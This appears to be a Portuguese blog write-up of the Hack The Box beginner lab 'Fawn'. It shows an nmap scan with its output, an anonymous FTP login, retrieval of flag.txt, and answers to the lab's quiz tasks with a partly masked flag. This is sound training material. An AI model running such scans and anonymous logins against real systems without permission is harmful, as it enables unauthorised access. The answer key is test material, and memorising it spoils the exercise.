Hack The Box – Starting point – Fawn – Tier 0 Machines

5 de fevereiro de 2023 Vitor Prado CyberSegurança 0

Fala Rapaziada, beleza?

Hoje vou trazer a resolução do Laboratório Fawn do Starting point do HTB.

Capture To Flag

Primeiro passo, executei um nmap para ver as portas abertas. Como sei que esse CTF está relacionado ao FTP, também utilizei o parâmetro -A para rodar alguns scripts junto com scaner.

Na própria saida do nmap, já vejo que o ftp está configurado com o usuário padrão anonymous:anonymous, e que dentro do FTP existe o arquivo flag.txt 

nmap -sSV -Pn -p- -A 10.129.3.33 --min-rate=1000 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-05 12:42 EST
Nmap scan report for 10.129.3.33
Host is up (0.18s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.14.52
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=2/5%OT=21%CT=1%CU=41675%PV=Y%DS=2%DC=T%G=Y%TM=63DFEAD4
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M539ST11
OS:NW7%O6=M539ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%R
OS:UCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Unix

TRACEROUTE (using port 995/tcp)
HOP RTT       ADDRESS
1   185.91 ms 10.10.14.1
2   186.38 ms 10.129.3.33

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.89 seconds

Então, faço o acesso ao ftp com a credencial anonymous:anonymous.
Com comando ls -la, consigo listar arquivos e diretórios.
Com comando get, consigo fazer o download da flag.

ftp 10.129.3.33  
Connected to 10.129.3.33.
220 (vsFTPd 3.0.3)
Name (10.129.3.33:root): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||22484|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        121          4096 Jun 04  2021 .
drwxr-xr-x    2 0        121          4096 Jun 04  2021 ..
-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
226 Directory send OK.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||21372|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |**************************************************************************************************************************|    32      315.65 KiB/s    00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (0.16 KiB/s)

Após o download da flag, consigo abrí-la com cat.

cat flag.txt 
035db21c881520XXXXXXXXXXXXX

Tarefas

Task 1 – What does the 3-letter acronym FTP stand for?
R: File Transfer Protocol

Task 2 – Which port does the FTP service listen on usually?
R: 21

Task 3  –  What acronym is used for the secure version of FTP?
R: SFTP

Task 4 – What is the command we can use to send an ICMP echo request to test our connection to the target?
R: ping

Task 5 – From your scans, what version is FTP running on the target?
R: vsftpd 3.0.3

Task 6 – From your scans, what OS type is running on the target?
R: unix

Task 7 – What is the command we need to run in order to display the ‘ftp’ client help menu?
R: ftp -h

Task 8 – What is username that is used over FTP when you want to log in without having an account?
R:  anonymous

Task 9 – What is the response code we get for the FTP message ‘Login successful’?
R:  230

Task 10 – There are a couple of commands we can use to list the files and directories available on the FTP server. One is dir. What is the other that is a common way to list files on a Linux system.
R: ls

Task 11 – What is the command used to download the file we found on the FTP server?
R: get

Submit Flag
R: 035db21c881520XXXXXXXXXXXXX

Sobre Vitor Prado 42 Artigos
Nascido e criado nas periferias de Diadema-SP, encontrei no estudo e no conhecimento uma forma alternativa de enfrentar os desafios da vida, apesar das muitas barreiras colocadas no caminho.
Linkedin

Artigos Relacionados

Seja o primeiro a comentar

Faça um comentário

Seu e-mail não será divulgado.


*